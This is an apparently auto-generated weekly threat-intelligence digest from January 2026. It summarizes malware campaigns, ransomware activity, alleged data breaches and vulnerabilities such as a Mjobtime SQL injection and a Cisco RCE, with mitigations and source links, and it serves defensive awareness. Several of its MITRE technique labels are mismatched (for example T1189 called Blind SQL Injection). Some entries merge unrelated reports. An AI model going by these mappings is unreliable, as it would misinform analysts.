Jan-2026 - Week 4

PUBLISHED ON JAN 23, 2026 / 28 MIN READ

Weekly Threat Intel Briefing

Consolidated signals, vulnerabilities, IOCs, and detections for rapid operational action.

Total Signals27

Vulnerabilities2

IOCs19

Detections3

Analytics Snapshot

All available metrics from signals, vulnerabilities, IOCs, and detections.

Intel Category

Data Breach

Malware

Ransomware

Unspecified

APT

Geography targeted

Unspecified

USA

Algeria

Argentina; Afghanistan; Argentina, Japan, Australia, India

Global, Latin America, Spain, Belgium, South Korea, US, Armenia, Israel

Industry targeted

Unspecified

Insurance

Civil Society, Human Rights

Communications

Construction

IOC types

File Name

MD5

Command Line

Domain

IP Address

Weekly Signals

Executive summaries with attack context, business impact, and immediate actions.

How Hacked Construction Apps Are Bringing Down Jobsite Security

Exploit Severity: High Likelihood: Moderate Prevalence: Three incidents observed by Huntress in 2025.

PublishedJanuary 21, 2026

Updated

Vertical-specific construction applications face unique risks. Hacked apps stem from flaws in the software or its components, expanding the jobsite attack surface.

Attack Profile

Surface: Web Application (Mjobtime)

Phases: Initial Access, Lateral Movement, Command Execution

MITRE: Initial Access, Execution, Persistence T1189 (Blind SQL Injection), T1059.001 (Command and Scripting Interpreter: PowerShell)

Actors and Tooling

Threat Actors: Unknown

Malware/Tools: sqlservr.exe, xp_cmdshell

Campaign: Unknown

Business Impact

Why it matters: Construction companies often rely on specialized software for managing operations. Exploiting vulnerabilities in these applications can compromise critical data and systems.

Owner team: Not specified

Mitigation

Patch Mjobtime to version 15.7.3 or later. Secure MSSQL instances, restrict access, and disable xp_cmdshell.

Immediate Actions

Check for Mjobtime installations. Review IIS logs for suspicious POST requests to /Default.aspx/update_profile_Server. Verify xp_cmdshell is disabled on MSSQL instances.

SQL InjectionConstructionAccounting SoftwareMjobtimeFOUNDATION

https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security

Inside a Multi-Stage Windows Malware Campaign

Malware Severity: High Likelihood: N/A Prevalence: N/A

PublishedJanuary 20, 2026

Updated

FortiGuard Labs analysis of a multi-stage Windows malware campaign that abuses trusted platforms to disable defenses, deploy RATs, and deliver ransomware.

Attack Profile

Surface: User Execution of LNK files

Phases: Initial Infection, Payload Delivery, System Compromise

MITRE: Initial Access, Execution, Persistence, Defense Evasion, Collection, Command and Control T1566.001 - Phishing, T1204.002 - Obfuscated Files or Information, T1059.001 - Command and Scripting Interpreter: PowerShell, T1078 - Valid Accounts

Actors and Tooling

Threat Actors: Unknown

Malware/Tools: Amnesia RAT, Microsoft Defender

Campaign: N/A

Business Impact

Why it matters: Widespread file encryption, stolen data, abuse of Defendnot to disable Microsoft Defender.

Owner team: N/A

Mitigation

User education on phishing and social engineering, security control bypass, Defender updates.

Immediate Actions

Review PowerShell execution policies, monitor for suspicious file activity.

WindowsPowerShellSocial EngineeringRansomwareDefendnotDefender Bypass

https://feeds.fortinet.com/~/940900697/0/fortinet/blog/threat-research~Inside-a-MultiStage-Windows-Malware-Campaign

The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time

Malware Severity: Likelihood: Prevalence:

PublishedJanuary 22, 2026

Updated

We discuss a novel AI-augmented attack method where malicious webpages use LLM services to generate dynamic code in real-time within a browser. The post The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time appeared first on Unit 42 .

Attack Profile

Surface: Web Browsers

Phases: Delivery, Execution

MITRE: Execution

Actors and Tooling

Threat Actors:

Malware/Tools: LogoKit

Campaign:

Business Impact

Why it matters: This technique allows attackers to evade network analysis, increase the diversity of malicious scripts, and tailor phishing campaigns.

Owner team:

Mitigation

Runtime behavioral analysis that can detect and block malicious activity at the point of execution within the browser.

Immediate Actions

Contact Unit 42 Incident Response if compromised.

APIDeepSeekGoogleJavaScriptLLMPhishing

https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/

DNS OverDoS: Are Private Endpoints Too Private?

DoS Severity: Likelihood: Prevalence: Over 5% of Azure storage accounts are susceptible.

PublishedJanuary 20, 2026

Updated

We've identified an aspect of Azure’s Private Endpoint architecture that could expose Azure resources to denial of service (DoS) attacks. The post DNS OverDoS: Are Private Endpoints Too Private? appeared first on Unit 42 .

Attack Profile

Surface: Azure Private Link, DNS resolution

Phases: Reconnaissance, Denial of Service

MITRE: Denial of Service

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters: Denial of service to storage accounts can cause Azure Functions to fail, and DoS to Key Vaults can disrupt dependent processes.

Owner team:

Mitigation

Microsoft provides fallback to internet advice. Defenders should scan environments for susceptible resources.

Immediate Actions

Microsoft AzureNetworking

https://unit42.paloaltonetworks.com/dos-attacks-and-azure-private-endpoint/

Foxit, Epic Games Store, MedDreams vulnerabilities

Severity: Likelihood: Prevalence:

Published

Updated

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Foxit PDF Editor, one in the Epic Games Store, and twenty-one in MedDream PACS.. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

https://blog.talosintelligence.com/foxi-and-epic-games/

Operation DupeHike : UNG0902 targets Russian employees with DUPERUNNER and AdaptixC2

Malware Campaign Severity: Likelihood: Prevalence: Recently uncovered (Nov 2025)

PublishedJan 20, 2026

Updated

Contents Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings. Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – DUPERUNNER Implant Stage 3 – AdaptixC2 Beacon. Infrastructural Artefacts. Conclusion SEQRITE Protection. IOCs MITRE ATT&CK. Introduction SEQRITE APT-Team have recently uncovered a campaign, which has been targeting Russian […] The post Operation DupeHike : UNG0902 targets Russian employees with DUPERUNNER and AdaptixC2 appeared first on Blogs on Information Technology, Network & Cybersecurity | Seqrite .

Attack Profile

Surface: Email (Spear Phishing)

Phases: Initial Infection, Lateral Movement, Command and Control

MITRE: Initial Access, Execution, Command and Control T1566.001 (Phishing), T1204.002 (User Execution via Malicious File), T1059.001 (Command and Scripting Interpreter – PowerShell), T1047 (Windows Management Instrumentation)

Actors and Tooling

Threat Actors: UNG0902

Malware/Tools: DUPERUNNER, AdaptixC2, PowerShell

Campaign: Operation DupeHike

Business Impact

Why it matters: Targets critical departments (HR, payroll) within Russian organizations, potentially leading to data breaches and financial fraud.

Owner team:

Mitigation

Immediate Actions

APTDUPERUNNERAdaptixC2RussiaHRPayroll

https://www.seqrite.com/blog/operation-dupehike-ung0902-targets-russian-employees-with-duperunner-and-adaptixc2/

Operation Covert Access: Weaponized LNK-Based Spear-Phishing Targeting Argentina’s Judicial Sector to Deploy a Covert RAT

Malware Severity: Likelihood: Prevalence: Globally Active

PublishedJan 19, 2026

Updated

Table of Contents: Introduction: Infection Chain: Targeted sectors: Initial Findings about Campaign: Analysis of Decoy: Technical Analysis: Stage-1: Analysis of Windows Shortcut file (.LNK). Stage-2: Analysis of Batch file. Stage-3: Details analysis of Covert RAT. Conclusion: Seqrite Coverage: IOCs MITRE ATT&CK Introduction: Seqrite Labs has identified and uncovered a globally active spear-phishing campaign targeting Argentina’s […] The post Operation Covert Access: Weaponized LNK-Based Spear-Phishing Targeting Argentina’s Judicial Sector to Deploy a Covert RAT appeared first on Blogs on Information Technology, Network & Cybersecurity | Seqrite .

Attack Profile

Surface: Email

Phases: Initial Access, Execution, Persistence

MITRE: Initial Access, Execution, Persistence; Initial Access, Persistence, Execution, Exfiltration; Initial Access, Persistence, Command and Control T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File); T1566.001 (Phishing: Spearphishing Attachment), T1059.003 (Command and Scripting Interpreter: PowerShell), T1053.001 (Scheduled Task/Job: Scheduled Task); T1566.001 (Phishing), T1547.001 (Boot or Logon Autostart Execution), T1059.003 (Scheduled Task/Job: Post-Scheduling)

Actors and Tooling

Threat Actors: Unknown; KONNI

Malware/Tools: Rust-based RAT, PowerShell, Batch scripts; FALSECUB; PowerShell Backdoor, OneDriveUpdater.exe

Campaign: Operation Covert Access

Business Impact

Why it matters: Targets sensitive legal and institutional data within the judicial sector.

Owner team:

Mitigation

Immediate Actions

spear-phishingLNKRATArgentinaJudicial Sector; APTSpear-PhishingFALSECUB; AIPowerShellSpear-PhishingRATNorth KoreaBlockchain

https://www.seqrite.com/blog/operation-covert-access-weaponized-lnk-based-spear-phishing-targeting-argentinas-judicial-sector-to-deploy-a-covert-rat/; https://www.seqrite.com/blog/operation-nomad-leopard-targeted-spear-phishing-campaign-against-government-entities-in-afghanistan/; https://research.checkpoint.com/2026/konni-targets-developers-with-ai-malware/

VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun

Malware Severity: Likelihood: Prevalence:

PublishedJanuary 20, 2026

Updated

Key Points Introduction When we first encountered VoidLink, we were struck by its level of maturity, high functionality, efficient architecture, and flexible, dynamic operating model. Employing technologies like eBPF and LKM rootkits and dedicated modules for cloud enumeration and post-exploitation in container environments, this unusual piece of malware seemed to be a larger development effort […] The post VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun appeared first on Check Point Research .

Attack Profile

Surface: Unknown

Phases: Unknown

MITRE:

Actors and Tooling

Threat Actors: Single individual

Malware/Tools: VoidLink, TRAE SOLO, TRAE

Campaign: VoidLink

Business Impact

Why it matters: Highlights the dangers of AI in malware development, normalizing high-complexity attacks previously associated with high-resource threat actors.

Owner team:

Mitigation

Immediate Actions

AIChatGPTMalwareThreat ResearchArtificial Intelligence

https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/

19th January – Threat Intelligence Report

Malware, Data Breach, Cyberattack Severity: Critical Likelihood: High Prevalence: High

PublishedJanuary 19, 2026

Updated

For the latest discoveries in cyber research for the week of 19th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Spanish energy company Endesa has disclosed a data breach after unauthorized access to a commercial platform used to manage customer information. Media report attackers listed over 1 terabyte of data, including IBANs, […] The post 19th January – Threat Intelligence Report appeared first on Check Point Research .

Attack Profile

Surface: Customer data platforms, IT systems, servers, email platforms, third-party vendors, WordPress plugins, Bluetooth accessories, Microsoft Desktop Window Manager

Phases: Initial Access, Exploitation, Lateral Movement, Data Exfiltration

MITRE: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Data Encrypted for Impact, Command and Control Spearphishing Attachment (T1566.001), Exploit Public-Facing Application (T1190), Credential Theft (T1003), Data Encrypted for Impact (T1486), Command and Control

Actors and Tooling

Threat Actors: Unknown, China-affiliated, Possibly Russian-linked (Sicarii ransomware)

Malware/Tools: Ransomware, Sicarii, VoidLink

Campaign: N/A

Business Impact

Why it matters: These attacks highlight the continued risk of data breaches, ransomware, and social engineering. The exploitation of vulnerabilities like CVE-2025-37164 and CVE-2026-20805 requires immediate attention. The wide range of targeted organizations demonstrates the broad threat landscape.

Owner team: N/A

Mitigation

Patch vulnerabilities (CVE-2025-37164, CVE-2026-20805, CVE-2026-23550), Implement strong security awareness training, strengthen third-party risk management, improve incident response capabilities

Immediate Actions

Data BreachCyberattackRansomwarePhishingVulnerability Exploitation

https://research.checkpoint.com/2026/19th-january-threat-intelligence-report/; https://research.checkpoint.com/

Ransom & Dark Web Issues Week 3, January 2026

Ransomware Severity: Likelihood: Prevalence:

PublishedJan 22 2026

Updated

ASEC Blog publishes Ransom & Dark Web Issues Week 3, January 2026 Qilin Ransomware Targets Korean Specialist in Semiconductor/Display Components & Surface Treatment U.S. DOJ: Access Broker “r1z” Pleads Guilty Qilin Ransomware Targets Vietnam’s National Airlines

Attack Profile

Surface: Endpoint, Networks

Phases:

MITRE:

Actors and Tooling

Threat Actors: Qilin Ransomware, r1z

Malware/Tools: Qilin Ransomware

Campaign:

Business Impact

Why it matters: Highlights ongoing ransomware activity, particularly targeting specific industries and geographic regions, and exposes access broker activity.

Owner team:

Mitigation

Subscribe to AhnLab TIP for IOCs and detailed analysis.

Immediate Actions

AirlinesDarkWebDataBreachDataLeakDDWDeepWebDepartmentOfJustice랜섬웨어데이터유출데이터탈취미국개인정보유출개인정보탈취반도체베트남법무부대한민국딥웹디스플레이다크웹표면처리항공사한국LeakedQilinRansomRansomwareSemiConductorSouthKoreaSurfaceTreatmentUnitedStatesUSAVietnam

https://asec.ahnlab.com/en/92258/

December 2025 Security Issues in Korean & Global Financial Sector

Phishing/Scam Severity: Likelihood: Prevalence:

PublishedJan 21 2026

Updated

This report comprehensively covers real-world cyber threats and security issues that have occurred in the financial industry in Korea and worldwide. It includes an analysis of malware and phishing cases targeting the financial industry, a list of the top 10 malware strains targeting the industry, and statistics on the sectors of Korean accounts leaked on […]

Attack Profile

Surface: Networks, EndPoint

Phases:

MITRE:

Actors and Tooling

Threat Actors: INC Ransom, BreachLaboratory

Malware/Tools: INCRansom

Campaign:

Business Impact

Why it matters: Significant data breaches affecting major financial institutions pose a systemic risk to national financial systems and require proactive measures.

Owner team:

Mitigation

Immediate Actions

DarkForumsDarkWebDeepWebEmail금융권financialINCRansomkazuMontiPhishing

https://asec.ahnlab.com/en/92207/

Proxyware Disguised as Notepad++ Tool

Malware Severity: Likelihood: Prevalence: Increasing in South Korea

Published

Updated

AhnLab SEcurity intelligence Center(ASEC) is monitoring Proxyjacking attacks and continuously disclosing distribution cases and IoCs identified in South Korea. The threat actor Larva‑25012, known for deploying Proxyware, has recently begun using malware disguised as a Notepad++ installer. In addition, the attacker is actively changing techniques to evade detection—such as injecting Proxyware into the Windows Explorer […]

Attack Profile

Surface: Software Download Portals, Task Scheduler, DLL side-loading

Phases: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion

MITRE: Defense Evasion, Execution, Persistence T1059.003 - Task Scheduler, T1027 - Obfuscated Files or Information, T1202 - Indirect Command Execution

Actors and Tooling

Threat Actors: Larva-25012

Malware/Tools: Proxyware (DigitalPulse, Honeygain, Infatica), DPLoader, Notepad++

Campaign:

Business Impact

Why it matters: Proxyware hijacks user bandwidth for malicious purposes, impacting performance and potentially exposing users to further attacks.

Owner team:

Mitigation

Immediate Actions

ProxywareNotepad++Larva-25012ProxyjackingDPLoaderInfaticaDigitalPulse

https://asec.ahnlab.com/en/92183/

December 2025 APT Group Trends

APT Severity: Likelihood: Prevalence:

PublishedJan 19 2026

Updated

Key APT Group Trends by Region 1) North Korea North Korean state‑sponsored threat groups have increasingly relied on fake IT employment schemes, actively exploiting legitimate hiring platforms and fabricated identities to infiltrate corporate environments. These actors frequently take advantage of remote‑work infrastructures to obtain elevated access and conduct long‑term social engineering operations […]

Attack Profile

Surface: Remote Work Infrastructure, Hiring Platforms

Phases: Initial Access, Exploitation, Persistence

MITRE: Initial Access Social Engineering (T1566), Impersonation (T1098)

Actors and Tooling

Threat Actors: Famous Chollima

Malware/Tools: AnyDesk, Google Remote Desktop, Astrill VPN, Simplify Copilot, AIApply, Final Round AI

Campaign:

Business Impact

Why it matters: Highlights a growing trend of APT groups using fake job opportunities to gain access to critical systems and data.

Owner team:

Mitigation

Verify job applicants' identities, implement multi-factor authentication, monitor remote access activity, and educate employees about social engineering tactics.

Immediate Actions

APTNorth KoreaRemote WorkSocial EngineeringIT Employment

https://asec.ahnlab.com/en/92184/

Critical Infrastructure Attacks Became Routine for Hacktivists in 2025

Hacktivism Severity: Likelihood: Prevalence:

Published

Updated

Hacktivists moved well beyond their traditional DDoS attacks and website defacements in 2025, increasingly targeting industrial control systems (ICS), ransomware, breaches, and data leaks, as their sophistication and alignment with nation-state interests grew. That was one of the conclusions in Cyble’s exhaustive new 2025 Threat Landscape report , from which this blog was adapted. Looking ahead to 2026 and beyond, Cyble expects critical infrastructure attacks by hacktivists to continue to grow, increasing use of custom tools by hacktivists, and deepening alignment between nation-state interests and hacktivists. ICS Attacks by Hacktivists Surge Between December 2024 and December 2025, several hacktivist groups increased their focus on ICS and operational technology (OT) attacks. Z-Pentest was the most active actor, conducting repeated intrusions against a wide range of industrial technologies. Dark Engine (Infrastructure Destruction Squad) and Sector 16 persistently targeted ICS, primarily exposing Human Machine Interfaces (HMI). A secondary tier of groups, including Golden Falcon Team, NoName057 (16), TwoNet, RipperSec, and Inteid , also claimed to have conducted recurrent ICS-disrupting attacks, albeit on a smaller scale. HMI and web-based Supervisory Control and Data Acquisition (SCADA) interfaces were the most frequently targeted systems, followed by a limited number of Virtual Network Computing (VNC) compromises, which posed the greatest operational risks to several industries. Building Management System (BMS) platforms and Internet of Things (IoT) or edge-layer controllers were also targeted in increasing numbers, reflecting the broader exploitation of weakly secured IoT interfaces. Europe remained the primary region affected by pro-Russian hacktivist groups, with sustained targeting of Spain, Italy, the Czech Republic, France, Poland, and Ukraine contributing to the highest concentration of ICS-related intrusions. The Intersection of State Interests and Hacktivism State-aligned hacktivist activity remained persistent throughout 2025. Operation Eastwood (14–17 July) disrupted NoName057(16) ’s DDoS infrastructure, prompting swift retaliatory attacks from the hacktivist group. The group rapidly rebuilt capacity and resumed operations against Ukraine, the EU, and NATO, underscoring the resilience of state-directed ecosystems. U.S. indictments and sanctions further exposed alleged structured cooperation between Russian intelligence services and pro-Kremlin hacktivist fronts. The Justice Department detailed GRU-backed financing and tasking of the Cyber Army of Russia Reborn (CARR), as well as the state-sanctioned development of NoName057(16)’s DDoSia platform. Z-Pentest, identified as part of the same CARR ecosystem and attributed to GRU, continued targeting EU and NATO critical infrastructure, reinforcing the convergence of activist personas, state mandates, and operational doctrine. Pro-Ukrainian hacktivist groups, though not formally state-directed, conducted sustained, destructive operations against networks linked to the Russian military. The BO Team and the Ukrainian Cyber Alliance conducted several data destruction and wiper attacks, encrypting key Russian businesses and state machinery. Ukrainian actors repeatedly stated that exfiltrated datasets were passed to national intelligence services. Hacktivist groups Cyber Partisans BY (Belarus) and Silent Crow claimed a year-long Tier-0 compromise of Aeroflot’s IT environment, allegedly exfiltrating more than 20TB of data, sabotaging thousands of servers, and disrupting core airline systems, a breach that Russia’s General Prosecutor confirmed caused significant operational outages and flight cancellations. Research into BQT.Lock (BaqiyatLock) suggests a plausible ideological alignment with Hezbollah, as evidenced by narrative framing and targeting posture. However, no verifiable technical evidence has confirmed a direct organizational link. Cyb3r Av3ngers, associated with the Islamic Revolutionary Guard Corps (IRGC), struck critical infrastructure assets, including electrical networks and water utilities in Israel, the United States, and Ireland. After being banned on Telegram, the group resurfaced under the alias Mr. Soul Team. Tooling and capability development by hacktivist groups also grew significantly in 2025. Observed activities have included: Notable growth in custom tool creation (e.g., BQT Locker and associated utilities), including the adoption of ransomware as a hacktivist mechanism. Actors are increasingly using AI-generated text and imagery for propaganda and spreading misinformation and disinformation. Tool promotion and marketing is becoming an emerging driver fueling hacktivism. Hacktivist Sightings Surged 51% in 2025 In 2025, hacktivism evolved into a globally coordinated threat, closely tracking geopolitical flashpoints. Armed conflicts, elections, trade disputes, and diplomatic crises fueled intensified campaigns against state institutions and critical infrastructure, with hacktivist groups weaponizing cyber-insurgency to advance their propaganda agendas. Pro-Ukrainian, pro-Palestinian, pro-Iranian, and other nationalist groups launched ideologically driven campaigns tied to the Russia-Ukraine War, the Israel-Hamas conflict, Iran-Israel tensions, South Asian tensions, and the Thailand-Cambodia border crisis. Domestic political unrest in the Philippines and Nepal triggered sustained attacks on government institutions. Cyble recorded a 51% increase in hacktivist sightings in 2025, from 700,000 in 2024 to 1.06 million in 2025, with the bulk of activity focused on Asia and Europe (chart below). Pro-Russian state-aligned hacktivists and pro-Palestinian, anti-Israel collectives continued to be the primary drivers of hacktivist activity throughout 2025, shaping the operational tempo and geopolitical focus of the threat landscape. Alongside these dominant ecosystems, Cyble observed a marked increase in operations by Kurdish hacktivist groups and emerging Cambodian clusters, both of which conducted campaigns closely aligned with regional strategic interests. Below are some of the major hacktivist groups of 2025: India, Ukraine, and Israel were the countries most impacted by hacktivist activity in 2025 (country breakdown below). Among global regions targeted, Europe and NATO faced a sustained pro-Russian campaign marked by coordinated DDoS attacks, data leaks, and escalating ICS intrusions against NATO and EU member states. Government & LEA, Energy & Utilities, Manufacturing, and Transportation were consistent targets. In the Middle East, Israel remains the principal target amid the Gaza conflict-related escalation, Iran-Israel confrontation, and Yemen-Saudi hostilities. Saudi Arabia, UAE, Egypt, Jordan, Iraq, Syria, and Yemen faced sustained DDoS attacks , defacements, data leaks, and illicit access to exposed ICS assets from ideologically aligned coalitions operating across the region. In South Asia, India-Pakistan and India-Bangladesh tensions fueled high-volume, ideologically framed offensives, peaking around political flashpoints and militant incidents. Activity concentrated on Government & LEA, BFSI, Telecommunication, and Education. In Southeast Asia, border tensions and domestic unrest shaped a fragmented but active theatre: Thailand-Cambodia conflicts triggered reciprocal DDoS and defacements; Indonesia & Malaysia incidents stemmed from political and social disputes; the Philippines saw attacks linked to internal instability; and Taiwan emerged as a recurring target for pro-Russian actors. Below are some of the major hacktivist campaigns of 2025: Most Impacted Industries and Sectors 2025 witnessed a marked expansion of hacktivist focus across multiple industries. Government & LEA, Energy & Utilities, Education, IT & ITES, Transportation & Logistics, and Manufacturing experienced the most pronounced growth in targeting, driving the year’s overall increase in operational activity. The dataset also reveals a broadened attack surface, with several new or significantly expanded categories, including Agriculture & Livestock, Food & Beverages, Hospitality, Construction, Automotive, and Real Estate. Government & LEA was the most impacted sector by a wide margin, followed by Energy & Utilities (chart below). The Evolution of Hacktivism Hacktivism has evolved into a geopolitically charged, ICS-focused threat, continuing to exploit exposed OT environments and increasingly weaponizing ransomware as a protest mechanism. In 2026, hacktivists and cybercriminals will increasingly target exposed HMI/SCADA systems and VNC takeovers, aided by public PoCs and automated scanning templates, creating ripple effects across the energy, water, transportation, and healthcare sectors. Hacktivists and state actors will increasingly employ financially motivated tactics and appearances. State actors in Iran, Russia, and North Korea will increasingly adopt RaaS platforms to fund operations and maintain plausible deniability. Critical infrastructure attacks in Taiwan, the Baltic states, and South Korea will appear financially motivated while serving geopolitical objectives, complicating attribution and response. Critical assets should be isolated from the Internet wherever possible, and operational technology (OT) and IT networks should be segmented and protected with Zero Trust access controls. Vulnerability management , along with network and endpoint monitoring and hardening, is another critical cybersecurity best practice. Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks . Get a free external threat profile for your organization today. The post Critical Infrastructure Attacks Became Routine for Hacktivists in 2025 appeared first on Cyble .

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors: Hacktivists

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

Critical InfrastructureHacktivismCyber Attacks

https://cyble.com/blog/hacktivists-critical-infrastructure-attacks-2025/

CallOnDoc Telemedicine Platform Allegedly Breached, Exposing 1.14 Million Patient Records Including Medical Conditions

Data Breach Severity: Medium Likelihood: Prevalence: Limited availability (5 buyers)

PublishedJanuary 22, 2026

Updated

CallOnDoc Telemedicine Platform Allegedly Breached, Exposing 1.14 Million Patient Records Including Medical Conditions

Attack Profile

Surface: Internal systems

Phases: Initial Access, Data Exfiltration

MITRE: Exfiltration

Actors and Tooling

Threat Actors: iProfessor; aming

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of sensitive patient medical information could lead to identity theft, fraud, and reputational damage.

Owner team:

Mitigation

Immediate Actions

data breachtelemedicinepatient records; Data BreachHealthcareChinaMedical DataPatient Records

https://darkwebinformer.com/callondoc-telemedicine-platform-allegedly-breached-exposing-1-14-million-patient-records-including-medical-conditions/; https://darkwebinformer.com/guangdong-medical-university-affiliated-hospital-database-allegedly-for-sale-with-1-4gb-of-patient-and-clinical-data/

Attackers Actively Probing RCE Vulnerability in Cisco Enterprise Communications Products

Vulnerability Severity: Critical Likelihood: Prevalence:

PublishedJanuary 21, 2026

Updated

Attackers Actively Probing RCE Vulnerability in Cisco Enterprise Communications Products

Attack Profile

Surface: Web-based management interface

Phases: Initial Access, Exploitation

MITRE: Initial Access T1189 - Drive-by Compromise

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters: The vulnerability allows privilege escalation to root, potentially giving attackers full control of affected devices.

Owner team:

Mitigation

Apply Cisco's security patch when available.

Immediate Actions

Monitor for exploitation attempts, review network traffic for suspicious activity.

CiscoUnified CommunicationsRCEVulnerability

https://darkwebinformer.com/attackers-actively-probing-rce-vulnerability-in-cisco-enterprise-communications-products/; https://nvd.nist.gov/vuln/detail/CVE-2026-20045 https://darkwebinformer.com/attackers-actively-probing-rce-vulnerability-in-cisco-enterprise-communications-products/

Menulux Turkish POS Platform Allegedly Breached, Exposing 93,000 Customer Records

Data Breach Severity: Medium Likelihood: Prevalence: BreachForums

PublishedJanuary 21, 2026

Updated

Menulux Turkish POS Platform Allegedly Breached, Exposing 93,000 Customer Records

Attack Profile

Surface: POS platform

Phases:

MITRE:

Actors and Tooling

Threat Actors: 888

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of sensitive customer data including addresses, phone numbers, and potentially financial information from a POS system.

Owner team:

Mitigation

Immediate Actions

Data BreachPOSTurkish

https://darkwebinformer.com/menulux-turkish-pos-platform-allegedly-breached-exposing-93-000-customer-records/

53,000 USA Driver License Images Allegedly for Sale on Exploit Forum

Data Leak Severity: Medium Likelihood: Prevalence: Observed in October 2025, December 2025, and January 2026.

PublishedJanuary 21, 2026

Updated

53,000 USA Driver License Images Allegedly for Sale on Exploit Forum

Attack Profile

Surface: Exploit Forum

Phases: Initial Access, Data Exfiltration

MITRE: Collection

Actors and Tooling

Threat Actors: SinCity

Malware/Tools:

Campaign:

Business Impact

Why it matters: The sale of driver license images enables identity theft and fraud. The actor's history suggests a broader pattern of selling illicit credentials and materials.

Owner team:

Mitigation

Immediate Actions

driver licensedata leakfraudidentity theft

https://darkwebinformer.com/53-000-usa-driver-license-images-allegedly-for-sale-on-exploit-forum/

PCComponentes Allegedly Breached, Exposing 16.3 Million Customer Records Including Payment Card Data

Data Breach Severity: Medium Likelihood: Prevalence: Clear Web

PublishedJanuary 20, 2026

Updated

PCComponentes Allegedly Breached, Exposing 16.3 Million Customer Records Including Payment Card Data

Attack Profile

Surface: Customer Database

Phases:

MITRE:

Actors and Tooling

Threat Actors: daghetiaw

Malware/Tools:

Campaign:

Business Impact

Why it matters: The breach exposes sensitive customer data, including financial information, potentially leading to identity theft and financial fraud.

Owner team:

Mitigation

Immediate Actions

Data BreachPCComponentes

https://darkwebinformer.com/pccomponentes-allegedly-breached-exposing-16-3-million-customer-records-including-payment-card-data/

Ransomware IOCs Lookup

Ransomware Severity: Likelihood: Prevalence:

PublishedJanuary 20, 2026

Updated

Ransomware IOCs Lookup

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

RansomwareIOCs

https://darkwebinformer.com/ransomware-iocs-lookup/

Inter Partner Assistance Algeria Allegedly Hacked, Exposing Internal Systems, User Accounts, and Insurance Documents

Data Breach Severity: Medium Likelihood: Prevalence: Clear Web

PublishedJanuary 20, 2026

Updated

Inter Partner Assistance Algeria Allegedly Hacked, Exposing Internal Systems, User Accounts, and Insurance Documents

Attack Profile

Surface: Internal Systems

Phases: Initial Access, Exploitation

MITRE: Initial Access

Actors and Tooling

Threat Actors: darrk07x (TEAM DARK 07X), JOKEIR 07X, DR SHELL 08X

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of citizen data and insurance documents poses a risk of identity theft and financial fraud.

Owner team:

Mitigation

Immediate Actions

Data BreachAlgeriaInsurance

https://darkwebinformer.com/inter-partner-assistance-algeria-allegedly-hacked-exposing-internal-systems-user-accounts-and-insurance-documents/

Acuity Insurance Allegedly Breached, Exposing 9 Million Illinois Customer Records with Detailed Demographics

Data Breach Severity: Medium Likelihood: Prevalence:

PublishedJan 19, 2026

Updated

Acuity Insurance Allegedly Breached, Exposing 9 Million Illinois Customer Records with Detailed Demographics

Attack Profile

Surface: acuity.com

Phases:

MITRE:

Actors and Tooling

Threat Actors: Solonik

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of sensitive customer data including PII and financial information. Potential for identity theft, fraud, and targeted attacks.

Owner team:

Mitigation

Immediate Actions

Data BreachPIIConsumer LeadsInsurance

https://darkwebinformer.com/acuity-insurance-allegedly-breached-exposing-9-million-illinois-customer-records-with-detailed-demographics/

Fascist Forge Neo-Nazi Forum Database Allegedly Leaked with 2.3 Million Records

Data Breach Severity: Medium Likelihood: High Prevalence: Dark Web Forums

PublishedJanuary 19, 2026

Updated

Fascist Forge Neo-Nazi Forum Database Allegedly Leaked with 2.3 Million Records

Attack Profile

Surface: Online Forum Database

Phases: Initial Access, Data Collection, Exfiltration

MITRE: Collection Data Encapsulation (T1005), Exfiltration Over C2 Channel (T1041)

Actors and Tooling

Threat Actors: 0BITS

Malware/Tools: N/A

Campaign: ANTIFA Database Leak

Business Impact

Why it matters: The leaked data could be used for doxing, identity theft, and harassment of individuals associated with Fascist Forge. It also reveals the inner workings and communication of a network of white supremacists and accelerationist groups.

Owner team: N/A

Mitigation

Monitor dark web forums for further data dissemination. Review security practices for online forums to prevent similar breaches.

Immediate Actions

Monitor for misuse of compromised credentials.

data breachneo-naziforumleak

https://darkwebinformer.com/fascist-forge-neo-nazi-forum-database-allegedly-leaked-with-2-3-million-records/

Malware Trends Report 2025: New Security Risks for Businesses in 2026

Severity: Likelihood: Prevalence:

Published

Updated

